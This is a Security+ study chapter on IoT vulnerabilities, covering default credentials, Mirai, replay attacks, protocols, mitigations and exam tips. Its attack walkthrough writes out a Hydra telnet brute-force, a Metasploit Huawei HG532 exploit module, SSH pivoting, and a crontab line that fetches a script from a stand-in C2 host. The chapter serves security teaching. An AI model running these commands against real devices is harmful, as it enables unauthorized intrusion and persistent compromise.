This chapter covers IoT (Internet of Things) security vulnerabilities, a critical topic for the SY0-701 exam under Domain 2.0 (Threats, Vulnerabilities, and Mitigations), Objective 2.3. IoT devices are increasingly common in homes, enterprises, and industrial settings, yet they often lack basic security controls, making them prime targets for attackers. You will learn about the unique challenges of IoT security, common attack vectors, and how to mitigate these risks — all essential knowledge for the Security+ exam and real-world practice.
Jump to a section
Imagine a smart home lock that you control via a smartphone app. The lock itself is a small, low-power device with limited processing capabilities — it can only perform basic encryption and authentication. The lock communicates with your phone over Wi-Fi, and the phone communicates with the cloud service that manages access. Now, consider an attacker who wants to break in. They don't need to pick the physical lock; instead, they exploit the lock's weak points: its default password (often 'admin' or '1234'), its unencrypted Bluetooth communication, or its lack of firmware updates. The lock's manufacturer might have used a cheap microcontroller that can't handle strong encryption, so the lock uses a weak proprietary protocol. The attacker could also intercept the signal between your phone and the lock using a replay attack, capturing the unlock command and replaying it later. Once inside, the attacker might pivot to other devices on your home network, like a smart thermostat or camera, because the lock never isolated itself from the rest of the network. This analogy mirrors IoT security vulnerabilities: limited hardware resources (CPU, memory, battery) force trade-offs that attackers exploit through default credentials, unencrypted communications, lack of patching, and insufficient network segmentation.
What Are IoT Security Vulnerabilities?
IoT security vulnerabilities refer to weaknesses in Internet-connected devices that can be exploited by attackers. These devices include smart home gadgets (thermostats, cameras, locks), wearable health monitors, industrial sensors, and medical implants. Unlike traditional IT devices (servers, laptops), IoT devices are typically resource-constrained — they have limited CPU, memory, battery, and storage. This forces manufacturers to make trade-offs, often sacrificing security for cost and performance. Common vulnerabilities include:
Default or hardcoded credentials: Many IoT devices ship with default usernames and passwords (e.g., admin/admin) that users never change.
Lack of encryption: Data transmitted between IoT devices and controllers may be unencrypted or use weak encryption (e.g., WEP, deprecated SSL/TLS versions).
Insecure firmware/software: Devices may run outdated software with known vulnerabilities (e.g., CVE-2019-11043 in PHP, but many IoT devices use custom OS with no patching mechanism).
No secure boot or code signing: Attackers can flash malicious firmware.
Insufficient authentication/authorization: Weak or missing authentication allows unauthorized access.
Insecure ecosystem interfaces: Web interfaces, APIs, and mobile apps may have vulnerabilities like XSS or SQL injection.
Lack of device management: No way to update or monitor devices centrally.
Physical vulnerabilities: Open debug ports (UART, JTAG) allow direct access.
How IoT Vulnerabilities Are Exploited Mechanically
Attackers follow a systematic process to exploit IoT devices:
1. Reconnaissance: Scan for IoT devices using tools like Shodan (search engine for internet-connected devices) or Nmap. For example, Nmap can identify devices running default services on ports 80 (HTTP), 443 (HTTPS), 22 (SSH), or 23 (Telnet).
nmap -sV -p 80,443,22,23,8080 <target>2. Initial Access: Use default credentials or brute-force weak passwords. Many IoT devices use Telnet (port 23) with no encryption. Attackers can use tools like Hydra:
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://<target>Lateral Movement: Once on the device, attackers use it as a pivot point to reach other devices on the same network. Since IoT devices are often on the same VLAN as other systems, this can lead to data exfiltration or ransomware.
Persistence: Install malware or rootkits. Some IoT malware, like Mirai, scans for other vulnerable IoT devices to build botnets.
Command & Control: The compromised device communicates with an external C2 server for instructions, often using HTTP or DNS tunneling to evade detection.
Key Components, Variants, and Standards
IoT Protocols: MQTT (Message Queuing Telemetry Transport), CoAP (Constrained Application Protocol), AMQP (Advanced Message Queuing Protocol), and HTTP/HTTPS. MQTT is lightweight and uses publish/subscribe model; it often lacks encryption (TLS is optional). CoAP is based on UDP and uses DTLS for security.
Standards: IEEE 802.15.4 (Zigbee), Bluetooth Low Energy (BLE), Z-Wave, Wi-Fi, and LoRaWAN. Each has security implications: Zigbee uses AES-128 encryption but can be vulnerable to key extraction; BLE uses AES-CCM but pairing can be insecure.
Firmware: Often stored in flash memory; updates are rarely signed or encrypted. Attackers can reverse-engineer firmware to find hardcoded credentials or backdoors.
Hardware: Microcontrollers (e.g., ESP32, ARM Cortex-M) with limited resources. They may lack hardware security modules (HSM) or trusted platform modules (TPM).
How Attackers Exploit IoT Vulnerabilities
Mirai Botnet (2016): Targeted IoT devices (routers, cameras) using default Telnet credentials. Infected devices launched DDoS attacks. The source code was released, leading to variants like Satori, Okiru, and Masuta.
Replay Attacks: Capture and retransmit valid data transmissions (e.g., unlock command). Mitigation: use timestamps or nonces.
Firmware Attacks: Modify firmware to add backdoors. Example: CVE-2017-17215 in Huawei HG532 router allowed remote code execution via crafted packets.
Side-Channel Attacks: Exploit physical characteristics (power consumption, electromagnetic emissions) to extract keys. For example, differential power analysis (DPA) can recover AES keys from a smart card.
Man-in-the-Middle (MitM): Intercept communications between IoT device and cloud. Use tools like Bettercap or Ettercap.
How Defenders Mitigate IoT Vulnerabilities
Change Default Credentials: Enforce unique passwords at manufacturing; use password policies.
Use Strong Encryption: TLS 1.2/1.3 for network traffic; DTLS for UDP; AES-128/256 for data at rest.
Secure Boot and Code Signing: Verify firmware integrity before booting; sign firmware with private keys.
Network Segmentation: Place IoT devices on a separate VLAN with strict firewall rules. Use micro-segmentation.
Regular Updates: Implement over-the-air (OTA) update mechanisms with signed payloads.
Disable Unused Services: Turn off Telnet, debug ports, and unnecessary protocols.
Monitor and Log: Use SIEM to detect anomalous behavior (e.g., unexpected outbound connections).
Use IoT Security Gateways: Devices that mediate traffic and enforce security policies.
Real Command/Tool Examples
Shodan Search: Find exposed IoT devices. Example: shodan search "port:23".
Nmap Script: Detect default credentials: nmap --script http-default-accounts -p 80 <target>.
Firmware Analysis: Use Binwalk to extract firmware: binwalk -Me firmware.bin.
MQTT Security: Use mosquitto_sub with TLS: mosquitto_sub -h broker -t topic --cafile ca.crt.
Scan for IoT Devices
Use Shodan or Nmap to discover IoT devices on the network. For example, search for devices with open port 23 (Telnet) or 80 (HTTP). Nmap can identify device types via service banners. Example command: `nmap -sV -p 23,80,443,8080 192.168.1.0/24`. Look for responses like 'Huawei HG532' or 'IP Camera'. This step reveals potential targets with known vulnerabilities.
Attempt Default Credentials
Exploit Known Vulnerabilities
Search for CVEs related to the device's firmware version. Use Metasploit to automate exploitation. For example, CVE-2017-17215 (Huawei HG532) allows remote code execution via a crafted packet. Use `use exploit/multi/http/huawei_hg532_rce`. This step requires network access and knowledge of the device's OS.
Pivot to Internal Network
Once compromised, use the IoT device as a foothold to attack other systems. Set up a SOCKS proxy or use port forwarding to tunnel traffic. Example: `ssh -L 8080:internal-server:80 root@iot-device`. This bypasses network segmentation if the IoT device is on the same VLAN as critical assets.
Establish Persistence
Install a backdoor or malware that survives reboots. Modify the init scripts or cron jobs. For example, add a cron job to connect to a C2 server: `echo "*/5 * * * * /usr/bin/wget -O /tmp/update http://c2-server/update.sh" >> /etc/crontab`. Use rootkits like 'Mirai' to hide processes and maintain access.
Scenario 1: Enterprise IoT Camera Botnet
A SOC analyst notices unusual outbound traffic from an IP camera subnet to a known malicious IP. Using a SIEM like Splunk, they see connections on port 23 (Telnet) and 80 (HTTP) from internal to external. The analyst uses Shodan to confirm the camera's model and finds it has a known default password. The correct response: isolate the camera subnet via ACL, change all default credentials, and update firmware. A common mistake: assuming the camera is a low-risk device and ignoring the alert, leading to the camera being used in a DDoS attack.
Scenario 2: Medical Device Ransomware
A hospital's smart infusion pump is compromised via an unpatched vulnerability (CVE-2019-6263). The attacker gains access to the hospital's network and deploys ransomware. The analyst uses Wireshark to detect abnormal MQTT traffic from the pump to an external broker. Correct response: disconnect the pump, segment IoT devices onto a separate VLAN with no internet access, and enforce signed firmware updates. Common mistake: failing to monitor IoT traffic because it's considered 'non-critical', allowing the attack to go unnoticed for days.
Scenario 3: Smart Building HVAC Attack
An attacker exploits a default password on a building's smart thermostat to access the building management system (BMS). They then modify temperature settings to cause physical damage or increase energy costs. The engineer uses Nessus to scan for default credentials on the thermostat's web interface. Correct response: change passwords, disable remote management, and implement network segmentation. Common mistake: assuming the BMS is on an isolated network, but it's actually connected to the corporate network for convenience.
What SY0-701 Tests on This Objective
Objective 2.3 focuses on vulnerabilities associated with IoT devices. The exam expects you to:
Identify common IoT vulnerabilities: default credentials, lack of encryption, insecure firmware, weak authentication.
Understand attack vectors: Mirai botnet, replay attacks, MitM, firmware attacks.
Know mitigation strategies: network segmentation, secure boot, OTA updates, strong encryption.
Recognize protocols: MQTT, CoAP, Zigbee, BLE.
Common Wrong Answers and Why Candidates Choose Them
"Always use WPA2 for IoT devices" – Wrong because WPA2 is for Wi-Fi encryption; IoT devices may use other protocols like Zigbee. Candidates confuse network encryption with device security.
"IoT devices are secure because they use encryption" – Wrong because many IoT devices use weak encryption or no encryption. Candidates assume all devices follow best practices.
"Disabling unused ports is sufficient" – Wrong because it only reduces attack surface; other vulnerabilities remain (e.g., default credentials).
"IoT devices should be on the same network as other devices for convenience" – Wrong because segmentation is critical.
Specific Terms and Values - Mirai: botnet that exploited default Telnet credentials. - Port 23: Telnet; port 80: HTTP; port 443: HTTPS; port 1883: MQTT; port 5683: CoAP. - CVE-2017-17215: Huawei HG532 router RCE. - AES-128: common encryption for Zigbee.
Trick Questions - Question about 'firmware update' vs 'patch management': firmware updates apply to IoT, patch management to traditional IT. - 'Default credentials' vs 'weak passwords': default credentials are pre-set; weak passwords are user-chosen.
Decision Rule On scenario questions, eliminate answers that:
Suggest placing IoT devices on the same VLAN as critical systems.
Ignore the need for encryption or authentication.
Rely solely on antivirus (ineffective on IoT).
Assume all IoT devices are patched automatically.
IoT vulnerabilities include default credentials, lack of encryption, insecure firmware, and weak authentication.
The Mirai botnet exploited default Telnet credentials on IoT devices to create a massive DDoS botnet.
Network segmentation is critical: place IoT devices on separate VLANs with strict firewall rules.
Secure boot and code signing ensure only authorized firmware runs on IoT devices.
MQTT uses port 1883 (unencrypted) and 8883 (TLS); CoAP uses port 5683 (UDP).
Always change default credentials and disable unnecessary services like Telnet.
Firmware analysis tools like Binwalk can extract hidden credentials and backdoors.
These come up on the exam all the time. Here's how to tell them apart.
IoT Device Vulnerabilities
Limited CPU/memory prevents strong encryption
Often use default credentials that cannot be changed
Firmware updates rare or nonexistent
Use lightweight protocols (MQTT, CoAP) with weak security
Physical access often easy (debug ports)
Traditional IT Device Vulnerabilities
Sufficient resources for full encryption
Password policies enforced via AD
Regular patching via WSUS or SCCM
Use standard protocols (HTTPS, SSH) with strong security
Physical security controls (locks, server rooms)
Mistake
IoT devices are too small to be hacked.
Correct
Size doesn't prevent exploitation; attackers use default credentials and known vulnerabilities to compromise resource-constrained devices for botnets or pivoting.
Mistake
Encryption alone makes IoT devices secure.
Correct
Encryption protects data in transit, but devices may still have weak authentication, insecure firmware, or physical access vulnerabilities.
Mistake
All IoT devices support automatic updates.
Correct
Many IoT devices lack OTA update mechanisms; users must manually update, which rarely happens.
Mistake
IoT devices are isolated from the network.
Correct
IoT devices often share the same network as other devices, allowing lateral movement after compromise.
Mistake
Changing the default password is enough.
Correct
While important, other vulnerabilities like unencrypted communications, insecure APIs, and lack of secure boot remain.
Default credentials are the most common IoT vulnerability. Many devices ship with usernames and passwords like 'admin/admin' or 'root/root', and users rarely change them. Attackers use tools like Hydra to brute-force these credentials, gaining full access. On the exam, remember that default credentials are a top attack vector.
Mirai scans the internet for IoT devices with open Telnet ports (23) and attempts to log in using a list of 61 default username/password pairs. Once compromised, the device downloads and runs malware that reports to a C2 server. The botnet then launches DDoS attacks. Mirai's source code was released, leading to many variants.
MQTT is a publish/subscribe protocol over TCP (port 1883) with optional TLS (8883). CoAP is a request/response protocol over UDP (port 5683) with DTLS security. MQTT is more common in home automation; CoAP is used in constrained devices. Both lack mandatory encryption, so security relies on implementation.
Mitigations include: changing default credentials, using strong encryption (TLS/DTLS), implementing secure boot and code signing, segmenting IoT devices on separate VLANs, disabling unnecessary services (Telnet, debug ports), and regularly updating firmware via signed OTA updates. Also, use IoT security gateways and monitor traffic with SIEM.
A replay attack captures a valid data transmission (e.g., an unlock command) and retransmits it later to cause unauthorized action. For example, an attacker captures the signal from a smart lock's remote and replays it to unlock the door. Mitigation: use timestamps, sequence numbers, or nonces in the protocol.
IoT devices often have exposed debug ports (UART, JTAG) that allow direct firmware extraction or modification. An attacker with physical access can dump firmware, extract keys, or flash malicious code. Physical security controls like tamper-evident seals and locking enclosures are necessary.
Shodan is a search engine that indexes internet-connected devices. Attackers use it to find vulnerable IoT devices by searching for specific banners, open ports, or default credentials. For example, searching 'port:23' finds Telnet-enabled devices. Defenders use Shodan to audit their own exposed assets.
You've just covered IoT Security Vulnerabilities — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?